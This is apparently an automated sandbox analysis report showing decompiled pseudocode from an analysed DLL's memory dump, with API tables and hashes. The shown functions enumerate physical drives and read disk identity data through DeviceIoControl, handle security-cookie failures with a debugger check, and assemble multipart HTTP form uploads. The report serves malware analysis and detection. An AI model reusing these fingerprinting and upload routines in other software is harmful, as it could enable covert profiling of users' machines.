                                                                                                                                                                  0x1001d906
                                                                                                                                                                  0x1001d910
                                                                                                                                                                  0x1001d91a
                                                                                                                                                                  0x1001d94b
                                                                                                                                                                  0x1001da97
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da97
                                                                                                                                                                  0x1001d95a
                                                                                                                                                                  0x1001da76
                                                                                                                                                                  0x1001da7a
                                                                                                                                                                  0x1001da87
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da91
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da89
                                                                                                                                                                  0x1001d974
                                                                                                                                                                  0x1001d97f
                                                                                                                                                                  0x1001d985
                                                                                                                                                                  0x1001d98c
                                                                                                                                                                  0x1001d993
                                                                                                                                                                  0x1001d99a
                                                                                                                                                                  0x1001d9a1
                                                                                                                                                                  0x1001d9a8
                                                                                                                                                                  0x1001d9af
                                                                                                                                                                  0x1001d9b6
                                                                                                                                                                  0x1001d9bd
                                                                                                                                                                  0x1001d9cf
                                                                                                                                                                  0x1001d9fb
                                                                                                                                                                  0x1001da00
                                                                                                                                                                  0x1001da05
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da0d
                                                                                                                                                                  0x1001da16
                                                                                                                                                                  0x1001da19
                                                                                                                                                                  0x1001da22
                                                                                                                                                                  0x1001da2a
                                                                                                                                                                  0x1001da33
                                                                                                                                                                  0x1001da3c
                                                                                                                                                                  0x1001da50
                                                                                                                                                                  0x1001da60
                                                                                                                                                                  0x1001da65
                                                                                                                                                                  0x1001da6a
                                                                                                                                                                  0x1001da6c
                                                                                                                                                                  0x1001da6c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001da6a
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001D891
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001D8AC
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 1001D8CB
                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 1001D943
                                                                                                                                                                  • _memset.LIBCMT ref: 1001D9CF
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 1001DA7A
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 1001DA97
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle_memset$ControlCreateDeviceFilewsprintf
                                                                                                                                                                  • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                  • API String ID: 381188756-2935326385
                                                                                                                                                                  • Opcode ID: bf343d5d5fa73e07ffbe7669497774d3557a30f7b648ec5a239837437c2a4efd
                                                                                                                                                                  • Instruction ID: 9769834fe5c7fcaed127812980974d4bd2fdd9b920265f280a0c2248b2b16186
                                                                                                                                                                  • Opcode Fuzzy Hash: bf343d5d5fa73e07ffbe7669497774d3557a30f7b648ec5a239837437c2a4efd
                                                                                                                                                                  • Instruction Fuzzy Hash: EA615EB0D042189BEB20DF94CC95BDDB7B6EF84314F148199E5097B280DB76AAD8CF91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001DAD0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                  			E1001DAD0(void* __edi, intOrPtr _a4) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				void* _v16;
				short _v532;
				struct _OVERLAPPED* _v536;
				struct _OVERLAPPED* _v540;
				void _v544;
				long _v548;
				struct _OVERLAPPED* _v552;
				intOrPtr _v10532;
				void _v10556;
				char _v11556;
				void* _t56;
				void* _t70;
				void* _t71;

				_t70 = __edi;
				E10018B00(0x2d20);
				if(_a4 == 0) {
					L13:
					return 0;
				}
				_v8 = 0;
				_v12 = 0;
				_v552 = 0;
				while(1 != 0) {
					wsprintfW( &_v532, L"\\\\.\\PhysicalDrive%d", _v8);
					_t71 = _t71 + 0xc;
					_v16 = CreateFileW( &_v532, 0, 3, 0, 3, 0, 0);
					if(_v16 == 0xffffffff) {
						L10:
						_v8 =  &(_v8->Internal);
						_v552 = _v8;
						if(_v8 < 4) {
							continue;
						}
						return _v12;
					}
					_v548 = 0;
					_v536 = 0;
					_v544 = 0;
					_v540 = 0;
					E1000CF80(_t70,  &_v10556, 0, 0x2710);
					_t71 = _t71 + 0xc;
					if(DeviceIoControl(_v16, 0x2d1400,  &_v544, 0xc,  &_v10556, 0x2710,  &_v548, 0) != 0) {
						E1000CF80(_t70,  &_v11556, 0, 0x3e8);
						E1001D0A0(_v10532,  &_v10556,  &_v11556);
						_t56 = E1001D000( &_v11556, 0x104, _a4);
						_t71 = _t71 + 0x24;
						if(_t56 == 0) {
							_v12 = 1;
						}
					}
					CloseHandle(_v16);
					if(_v12 == 0) {
						_v8 = _v552;
						goto L10;
					} else {
						return _v12;
					}
				}
				goto L13;
			}


















                                                                                                                                                                  0x1001dad0
                                                                                                                                                                  0x1001dad8
                                                                                                                                                                  0x1001dae1
                                                                                                                                                                  0x1001dc50
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dc50
                                                                                                                                                                  0x1001dae7
                                                                                                                                                                  0x1001daee
                                                                                                                                                                  0x1001daf5
                                                                                                                                                                  0x1001daff
                                                                                                                                                                  0x1001db1c
                                                                                                                                                                  0x1001db22
                                                                                                                                                                  0x1001db3e
                                                                                                                                                                  0x1001db45
                                                                                                                                                                  0x1001dc2e
                                                                                                                                                                  0x1001dc34
                                                                                                                                                                  0x1001dc3a
                                                                                                                                                                  0x1001dc44
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dc4b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dc46
                                                                                                                                                                  0x1001db4b
                                                                                                                                                                  0x1001db55
                                                                                                                                                                  0x1001db5f
                                                                                                                                                                  0x1001db69
                                                                                                                                                                  0x1001db81
                                                                                                                                                                  0x1001db86
                                                                                                                                                                  0x1001dbb8
                                                                                                                                                                  0x1001dbc8
                                                                                                                                                                  0x1001dbe5
                                                                                                                                                                  0x1001dbfd
                                                                                                                                                                  0x1001dc02
                                                                                                                                                                  0x1001dc07
                                                                                                                                                                  0x1001dc09
                                                                                                                                                                  0x1001dc09
                                                                                                                                                                  0x1001dc07
                                                                                                                                                                  0x1001dc14
                                                                                                                                                                  0x1001dc1e
                                                                                                                                                                  0x1001dc2b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dc20
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001dc20
                                                                                                                                                                  0x1001dc1e
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001DB1C
                                                                                                                                                                  • CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DB38
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DB81
                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 1001DBB0
                                                                                                                                                                  • _memset.LIBCMT ref: 1001DBC8
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 1001DC14
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseControlCreateDeviceFileHandlewsprintf
                                                                                                                                                                  • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                  • API String ID: 1858725146-2935326385
                                                                                                                                                                  • Opcode ID: 72aa308726503228d4dbb6d10f427f4c68655386cdf40f6154bcdc289d9c98a1
                                                                                                                                                                  • Instruction ID: 915ac6fd4bdffd3e24e0157f7485166cbeb8f51988887240e801f9576dbfd67f
                                                                                                                                                                  • Opcode Fuzzy Hash: 72aa308726503228d4dbb6d10f427f4c68655386cdf40f6154bcdc289d9c98a1
                                                                                                                                                                  • Instruction Fuzzy Hash: B3413F75E40218EBEB10EB90DC89FDDB7B8EB14704F104599E509AA2C1D7B4ABC8CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001D3D0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                  			E1001D3D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _v24;
				short _v540;
				char _v1564;
				long _v1568;
				long _v1572;
				intOrPtr _v1576;
				struct _OVERLAPPED* _v1580;
				struct _OVERLAPPED* _v1584;
				struct _OVERLAPPED* _v1588;
				struct _OVERLAPPED* _v1592;
				struct _OVERLAPPED* _v1596;
				struct _OVERLAPPED* _v1600;
				struct _OVERLAPPED* _v1604;
				void _v1608;
				void* __ebp;
				int _t63;
				void* _t64;
				int _t76;
				void* _t77;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t97 = __esi;
				_t96 = __edi;
				_t77 = __ebx;
				_v12 = 0;
				_v16 = _a4;
				_v1584 = 0;
				_v1580 = 0;
				do {
					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
					_t99 = _t99 + 0xc;
					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
					if(_v24 != 0xffffffff) {
						_v1572 = 0;
						_v1608 = 0;
						_v1604 = 0;
						_v1600 = 0;
						_v1596 = 0;
						_v1592 = 0;
						_v1588 = 0;
						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
						__eflags = _t63;
						if(_t63 != 0) {
							_t64 = L1000CEAF(_t77,  &_v1608, _t96, _t97, 0x221);
							_t100 = _t99 + 4;
							_v8 = _t64;
							 *((char*)(_v8 + 0xa)) = 0xec;
							_v1568 = 0;
							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
							if(__eflags == 0) {
								L10:
								CloseHandle(_v24);
								_push(_v8);
								E1000CA40(_t77, _t96, _t97, __eflags);
								_t99 = _t100 + 4;
								__eflags = _v1584;
								if(_v1584 == 0) {
									_v12 = _v1580;
									goto L13;
								}
								break;
							}
							_v20 = 0;
							do {
								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
								_v20 = _v20 + 1;
								__eflags = _v20 - 0x100;
							} while (_v20 < 0x100);
							_v1576 = E1001CDD0( &_v1564);
							_t76 = E1001D000(_v1576, 0x104, _v16);
							_t100 = _t100 + 0x10;
							__eflags = _t76;
							if(__eflags == 0) {
								_v1584 = 1;
							}
							goto L10;
						}
						goto L13;
					}
					L13:
					_v12 =  &(_v12->Internal);
					_v1580 = _v12;
				} while (_v12 < 4);
				return _v1584;
			}































                                                                                                                                                                  0x1001d3d0
                                                                                                                                                                  0x1001d3d0
                                                                                                                                                                  0x1001d3d0
                                                                                                                                                                  0x1001d3d9
                                                                                                                                                                  0x1001d3e3
                                                                                                                                                                  0x1001d3e6
                                                                                                                                                                  0x1001d3f0
                                                                                                                                                                  0x1001d3fa
                                                                                                                                                                  0x1001d40a
                                                                                                                                                                  0x1001d410
                                                                                                                                                                  0x1001d42f
                                                                                                                                                                  0x1001d436
                                                                                                                                                                  0x1001d43d
                                                                                                                                                                  0x1001d447
                                                                                                                                                                  0x1001d451
                                                                                                                                                                  0x1001d45b
                                                                                                                                                                  0x1001d465
                                                                                                                                                                  0x1001d46f
                                                                                                                                                                  0x1001d479
                                                                                                                                                                  0x1001d4a2
                                                                                                                                                                  0x1001d4a8
                                                                                                                                                                  0x1001d4aa
                                                                                                                                                                  0x1001d4b6
                                                                                                                                                                  0x1001d4bb
                                                                                                                                                                  0x1001d4be
                                                                                                                                                                  0x1001d4c4
                                                                                                                                                                  0x1001d4c8
                                                                                                                                                                  0x1001d4f9
                                                                                                                                                                  0x1001d4fb
                                                                                                                                                                  0x1001d566
                                                                                                                                                                  0x1001d56a
                                                                                                                                                                  0x1001d573
                                                                                                                                                                  0x1001d574
                                                                                                                                                                  0x1001d579
                                                                                                                                                                  0x1001d57c
                                                                                                                                                                  0x1001d583
                                                                                                                                                                  0x1001d58d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d58d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d585
                                                                                                                                                                  0x1001d4fd
                                                                                                                                                                  0x1001d504
                                                                                                                                                                  0x1001d512
                                                                                                                                                                  0x1001d51f
                                                                                                                                                                  0x1001d522
                                                                                                                                                                  0x1001d522
                                                                                                                                                                  0x1001d53a
                                                                                                                                                                  0x1001d550
                                                                                                                                                                  0x1001d555
                                                                                                                                                                  0x1001d558
                                                                                                                                                                  0x1001d55a
                                                                                                                                                                  0x1001d55c
                                                                                                                                                                  0x1001d55c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d55a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d4ac
                                                                                                                                                                  0x1001d590
                                                                                                                                                                  0x1001d596
                                                                                                                                                                  0x1001d59c
                                                                                                                                                                  0x1001d5a2
                                                                                                                                                                  0x1001d5b5

                                                                                                                                                                  APIs
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001D40A
                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D429
                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 1001D4A2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ControlCreateDeviceFilewsprintf
                                                                                                                                                                  • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                  • API String ID: 3081802084-2935326385
                                                                                                                                                                  • Opcode ID: 785b4095dcf1ad38b12bd82e7762c96a16d820994563cc4dfa42c82c3201bccd
                                                                                                                                                                  • Instruction ID: f26b544c4fccea81e18431b955f202ed2237751288ed87d0487abbb64b72177a
                                                                                                                                                                  • Opcode Fuzzy Hash: 785b4095dcf1ad38b12bd82e7762c96a16d820994563cc4dfa42c82c3201bccd
                                                                                                                                                                  • Instruction Fuzzy Hash: 38512EB4D00218EFEB10DF94CC85BDEB7B5EB84704F104599E509AB280D7B6AB94CF95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000F05C, Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E1000F05C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x103342d8; // 0x19e36f22
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10335a58 = _t6;
				 *0x10335a54 = _t22;
				 *0x10335a50 = _t25;
				 *0x10335a4c = _t21;
				 *0x10335a48 = _t27;
				 *0x10335a44 = _t26;
				 *0x10335a70 = ss;
				 *0x10335a64 = cs;
				 *0x10335a40 = ds;
				 *0x10335a3c = es;
				 *0x10335a38 = fs;
				 *0x10335a34 = gs;
				asm("pushfd");
				_pop( *0x10335a68);
				 *0x10335a5c =  *_t31;
				 *0x10335a60 = _v0;
				 *0x10335a6c =  &_a4;
				 *0x103359a8 = 0x10001;
				_t11 =  *0x10335a60; // 0x0
				 *0x1033595c = _t11;
				 *0x10335950 = 0xc0000409;
				 *0x10335954 = 1;
				_t12 =  *0x103342d8; // 0x19e36f22
				_v812 = _t12;
				_t13 =  *0x103342dc; // 0xe61c90dd
				_v808 = _t13;
				 *0x103359a0 = IsDebuggerPresent();
				_push(1);
				E10013ABF(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10024b30);
				if( *0x103359a0 == 0) {
					_push(1);
					E10013ABF(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f062
                                                                                                                                                                  0x1000f064
                                                                                                                                                                  0x1000f064
                                                                                                                                                                  0x10016175
                                                                                                                                                                  0x1001617a
                                                                                                                                                                  0x10016180
                                                                                                                                                                  0x10016186
                                                                                                                                                                  0x1001618c
                                                                                                                                                                  0x10016192
                                                                                                                                                                  0x10016198
                                                                                                                                                                  0x1001619f
                                                                                                                                                                  0x100161a6
                                                                                                                                                                  0x100161ad
                                                                                                                                                                  0x100161b4
                                                                                                                                                                  0x100161bb
                                                                                                                                                                  0x100161c2
                                                                                                                                                                  0x100161c3
                                                                                                                                                                  0x100161cc
                                                                                                                                                                  0x100161d4
                                                                                                                                                                  0x100161dc
                                                                                                                                                                  0x100161e7
                                                                                                                                                                  0x100161f1
                                                                                                                                                                  0x100161f6
                                                                                                                                                                  0x100161fb
                                                                                                                                                                  0x10016205
                                                                                                                                                                  0x1001620f
                                                                                                                                                                  0x10016214
                                                                                                                                                                  0x1001621a
                                                                                                                                                                  0x1001621f
                                                                                                                                                                  0x1001622b
                                                                                                                                                                  0x10016230
                                                                                                                                                                  0x10016232
                                                                                                                                                                  0x1001623a
                                                                                                                                                                  0x10016245
                                                                                                                                                                  0x10016252
                                                                                                                                                                  0x10016254
                                                                                                                                                                  0x10016256
                                                                                                                                                                  0x1001625b
                                                                                                                                                                  0x1001626f

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 10016225
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001623A
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(10024B30), ref: 10016245
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 10016261
                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 10016268
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                  • Opcode ID: 480ebdca2b22ee730782bbd644a46fe22bac3cf6626a4db92fe4ddcdd4ec90c9
                                                                                                                                                                  • Instruction ID: ee8eee148a0b36da5bac1509a6259723a028944e4d48fabcbe23e45d6083a592
                                                                                                                                                                  • Opcode Fuzzy Hash: 480ebdca2b22ee730782bbd644a46fe22bac3cf6626a4db92fe4ddcdd4ec90c9
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B21D2B8802224DFD702DF65DCC46453BBCFB88315F915619E90D8EBA2EB709985EF05
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100215A0, Relevance: 48.4, APIs: 32, Instructions: 449COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                  			E100215A0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
				char _v8;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v543;
				char _v544;
				char _v807;
				char _v808;
				char* _v812;
				char _v1079;
				char _v1080;
				char* _v1084;
				char* _v1088;
				char _v1599;
				char _v1600;
				intOrPtr _v1604;
				char _v15703;
				char _v15704;
				char* _v15708;
				char _v29807;
				char _v29808;
				char* _v29812;
				char _v43911;
				char _v43912;
				char _v58007;
				char _v58008;
				char _v58024;
				char _v58052;
				char _v58080;
				char _v58084;
				void* __esi;
				void* _t172;
				intOrPtr _t179;
				void* _t186;
				void* _t195;
				void* _t216;
				void* _t218;
				void* _t237;
				void* _t254;
				intOrPtr _t297;
				intOrPtr _t357;
				void* _t359;
				void* _t366;
				void* _t376;
				void* _t385;
				void* _t392;

				_t353 = __edi;
				_t265 = __ebx;
				_push(0xffffffff);
				_push(E100231DA);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t357;
				E10018B00(0xe2d4);
				_push(_t354);
				_v24 = 0;
				_v28 = "--";
				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
					_v1084 = "Content-Type: %s";
					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
					_v808 = 0;
					E1000CF80(__edi,  &_v807, 0, 0x103);
					_v1080 = 0;
					E1000CF80(_t353,  &_v1079, 0, 0x103);
					_v1600 = 0;
					E1000CF80(_t353,  &_v1599, 0, 0x1ff);
					_push(_a20);
					_push(_a16);
					E1000CCA3(_t353,  &_v808, _v812, _a16);
					E1000CCA3(_t353,  &_v1080, _v1084, _a24);
					_push( &_v1080);
					_push( &_v808);
					_push(_a4);
					E1000CCA3(_t353,  &_v1600, _v1088, _v28);
					_t392 = _t357 + 0x5c;
					if( *_a36 != 0) {
						E1000D1F0(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAD0( &_v1600));
						_t392 = _t392 + 0x10;
					}
					_t254 = E1000CAD0( &_v1600);
					_t357 = _t392 + 4;
					_v24 = _t254 + _v24;
					if( *_a36 != 0) {
						E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
						_t357 = _t357 + 0xc;
					}
					_v24 = _v24 + _a32;
				}
				if(_a8 != 0 && _a12 > 0) {
					_t172 = E10001A50(_a8, "=");
					_t357 = _t357 + 8;
					if(_t172 != 0) {
						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
						_v58008 = 0;
						E1000CF80(_t353,  &_v58007, 0, 0x370f);
						_v29808 = 0;
						E1000CF80(_t353,  &_v29807, 0, 0x370f);
						_v43912 = 0;
						E1000CF80(_t353,  &_v43911, 0, 0x370f);
						_v15704 = 0;
						E1000CF80(_t353,  &_v15703, 0, 0x370f);
						_t179 = E10001A50(_a8, "&");
						_t366 = _t357 + 0x38;
						_v1604 = _t179;
						if(_v1604 != 0) {
							E10001160( &_v58052, __eflags, _a8);
							_v8 = 0;
							E10003060( &_v58024, __eflags);
							_v8 = 1;
							E10001160( &_v58080, __eflags, "&");
							_v8 = 2;
							E1001A8B0(__eflags,  &_v58052,  &_v58024,  &_v58080);
							_t357 = _t366 + 0xc;
							_v58084 = 0;
							while(1) {
								_t186 = E10002270( &_v58024);
								__eflags = _v58084 - _t186;
								if(_v58084 >= _t186) {
									break;
								}
								E1000CF80(_t353,  &_v43912, 0, 0x3710);
								E1000CF80(_t353,  &_v15704, 0, 0x3710);
								_t195 = E10001A50(E100011E0(E100030B0( &_v58024, __eflags, _v58084)), "=");
								_t354 = _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084));
								E1000D1F0(_t265, _t353, _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E100030B0( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E100030B0( &_v58024, __eflags, _v58084)));
								E1000D903(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E100030B0( &_v58024, __eflags, _v58084)), "=") + 1);
								E1000CF80(_t353,  &_v58008, 0, 0x3710);
								E1000CF80(_t353,  &_v29808, 0, 0x3710);
								E1000CCA3(_t353,  &_v58008, _v15708,  &_v43912);
								_push( &_v15704);
								_push( &_v58008);
								_push(_a4);
								E1000CCA3(_t353,  &_v29808, _v29812, _v28);
								_t376 = _t357 + 0x7c;
								__eflags =  *_a36;
								if( *_a36 != 0) {
									_t218 = E1000CAD0( &_v29808);
									__eflags =  *_a36 + _v24;
									E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
									_t376 = _t376 + 0x10;
								}
								_t216 = E1000CAD0( &_v29808);
								_t357 = _t376 + 4;
								_v24 = _t216 + _v24;
								_t297 = _v58084 + 1;
								__eflags = _t297;
								_v58084 = _t297;
							}
							_v8 = 1;
							E100011A0( &_v58080);
							_v8 = 0;
							E10003090( &_v58024);
							_v8 = 0xffffffff;
							E100011A0( &_v58052);
						} else {
							E1000D1F0(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
							E1000D903(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
							E1000CF80(_t353,  &_v58008, 0, 0x3710);
							E1000CF80(_t353,  &_v29808, 0, 0x3710);
							E1000CCA3(_t353,  &_v58008, _v15708,  &_v43912);
							_push( &_v15704);
							_push( &_v58008);
							_push(_a4);
							E1000CCA3(_t353,  &_v29808, _v29812, _v28);
							_t385 = _t366 + 0x64;
							if( *_a36 != 0) {
								E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAD0( &_v29808));
								_t385 = _t385 + 0x10;
							}
							_t237 = E1000CAD0( &_v29808);
							_t357 = _t385 + 4;
							_v24 = _t237 + _v24;
						}
					}
				}
				_v20 = "\r\n%s%s%s\r\n";
				_v544 = 0;
				E1000CF80(_t353,  &_v543, 0, 0x1ff);
				_push(_v28);
				_push(_a4);
				E1000CCA3(_t353,  &_v544, _v20, _v28);
				_t359 = _t357 + 0x20;
				if( *_a36 != 0) {
					E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAD0( &_v544));
					_t359 = _t359 + 0x10;
				}
				_v24 = E1000CAD0( &_v544) + _v24;
				 *[fs:0x0] = _v16;
				return _v24;
			}


















































                                                                                                                                                                  0x100215a0
                                                                                                                                                                  0x100215a0
                                                                                                                                                                  0x100215a3
                                                                                                                                                                  0x100215a5
                                                                                                                                                                  0x100215b0
                                                                                                                                                                  0x100215b1
                                                                                                                                                                  0x100215bd
                                                                                                                                                                  0x100215c2
                                                                                                                                                                  0x100215c3
                                                                                                                                                                  0x100215ca
                                                                                                                                                                  0x100215d5
                                                                                                                                                                  0x10021603
                                                                                                                                                                  0x1002160d
                                                                                                                                                                  0x10021617
                                                                                                                                                                  0x10021621
                                                                                                                                                                  0x10021636
                                                                                                                                                                  0x1002163e
